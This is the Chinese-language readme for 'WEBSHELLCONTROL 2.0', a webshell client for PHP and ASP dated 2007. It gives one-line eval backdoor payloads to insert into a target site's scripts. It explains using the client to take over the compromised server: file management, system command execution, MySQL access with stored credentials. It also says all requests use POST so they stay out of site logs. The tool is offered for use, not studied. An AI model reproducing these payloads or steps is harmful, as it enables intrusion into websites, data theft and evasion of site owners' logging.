WEBSHELLCONTROL 2.0

本程序集PHP和ASP的EVAL客户端于一体，可根据输入的地址自动调用相应的模块来连接我们的脚本后门！

基本常识：先在目标脚本程序(PHP或ASP)中插入后门，PHP脚本<?和?>之间插入通用代码@eval($HTTP_POST_VARS['pass']); ASP脚本则在<%和%>之间插入eval request("pass")即可用本程序连接你处理过的后门文件如http://xxx/xxx.php或http://xxx/xxx.asp，连接的密码为前面所写的pass,这个密码是可改的。

使用步骤：先打开SHELL管理对话框，在地址：后面填上SHELL的地址，接着输入密码，为了方便记忆，可以输些备注，如果有MYSQL，可以在备注处输入： mysql地址 | mysql用户名 | mysql密码 | 其他信息,然后点击“连接|添加|修改”按钮，如果是新的SHELL地址就会把当前地址加到数据库中，如果是己存在的SHELL，就会修改存入数据库，之后开始连接，此时主界面上的相应按钮就会生效，并且在标题栏显示相关信息，如果是WIN系统，还会显示相应的盘符，这时你就可以使用相应的功能了。

文件管理：浏览|删除|编辑|上传|下载文件等基本功能。

网站SHELL执行监视：如果有特殊需要，可以使用这个功能，在命令处输入SYSTEM命令，如果这个命令的执行结果有变化，就会得到报警提示。

SYSTEMSHELL：如果是PHP时，可直接输入命令，并可以用分号输入多句，如果是ASP时，必须在之前加上CMD.EXE的路径加 /c 再加命令。

MYSQL管理：如果你在前面己填写过配置信息，将会自动填写上连接的地址帐号和密码了，然后点连接即会显示数据库列表，再点数据库列表就会显示相应的数据表名，再点击数据表名就会显示列名，对于SQL语句的执行，你最少可以使用的语句有：SELECT，UPDATE，DELETE等基本功能。

我的日志：可以在这里保存你的有用的信息，关键时候可以直接查询。这是一个很好用的功能。

本程序在提交的过程中除了ASP部分上传时会有一个GET参数外，其它所有操作都是POST完成的，避免了网站日志的记录。

版本2.0新添入文件下载功能

如果喜欢本程序，请关注后续版本的开发
桂林老兵站

http://www.gxgl.com
http://www.gxgl.net

2007-1-30更新